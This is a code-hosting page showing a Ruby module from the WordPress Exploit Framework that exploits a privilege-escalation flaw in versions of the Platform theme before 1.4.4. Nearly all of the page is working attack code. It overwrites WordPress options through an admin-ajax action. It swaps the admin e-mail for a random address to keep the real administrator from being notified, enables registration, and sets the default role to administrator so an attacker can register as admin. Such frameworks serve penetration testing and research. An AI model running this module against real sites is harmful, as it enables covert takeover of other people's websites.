rastating/wordpress-exploit-framework

View on GitHub
lib/wpxf/modules/auxiliary/priv_esc/platform_privilege_escalation.rb

Summary

Maintainability
A
2 hrs
Test Coverage
# frozen_string_literal: true

class Wpxf::Auxiliary::PlatformPrivilegeEscalation < Wpxf::Module
  include Wpxf
  include Wpxf::WordPress::Login

  def initialize
    super

    update_info(
      name: 'Platform Theme Privilege Escalation',
      desc: %(
        This module exploits a privilege escalation vulnerability in
        versions < 1.4.4 of the Platform theme which allows authenticated
        users of any level to update any WordPress option.

        The module first changes the admin e-mail address to prevent any
        notifications being sent to the actual administrator during the
        attack, re-enables user registration in case it has been
        disabled and sets the default role to be administrator.
        This will allow for the user to create a new account with admin
        privileges via the default registration page found at
        /wp-login.php?action=register.
      ),
      desc_preformatted: true,
      author: [
        'Marc-Alexandre Montpas', # Vulnerability discovery
        'rastating'               # WPXF module
      ],
      references: [
        ['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
        ['WPVDB', '7762']
      ],
      date: 'Jan 21 2015'
    )
  end

  def check
    check_theme_version_from_style('platform', '1.4.4')
  end

  def requires_authentication
    true
  end

  def set_wp_option(name, value)
    res = execute_post_request(
      url: wordpress_url_admin_ajax,
      params: { 'action' => 'pagelines_ajax_save_option' },
      body: { 'option_name' => name, 'option_value' => value },
      cookie: session_cookie
    )

    if res.nil?
      emit_error 'No response from the target', true
    elsif res.code != 200
      emit_warning "Server responded with code #{res.code}", true
    elsif res.code == 200
      emit_success "Option \"#{name}\" appears to have been set", true
    end

    res
  end

  def run
    return false unless super

    new_email = "#{Utility::Text.rand_alpha(5)}@#{Utility::Text.rand_alpha(5)}.com"
    emit_info "Changing admin e-mail address to #{new_email}..."
    if set_wp_option('admin_email', new_email).nil?
      emit_error 'Failed to change the admin e-mail address'
      return false
    end

    emit_info 'Enabling user registrations...'
    if set_wp_option('users_can_register', 1).nil?
      emit_error 'Failed to enable user registrations'
      return false
    end

    emit_info 'Setting the default user role...'
    if set_wp_option('default_role', 'administrator').nil?
      emit_error 'Failed to set the default user role'
      return false
    end

    register_url = normalize_uri(full_uri, 'wp-login.php?action=register')
    emit_success 'Privilege escalation complete'
    emit_success "Create a new account at #{register_url} to gain admin access."

    true
  end
end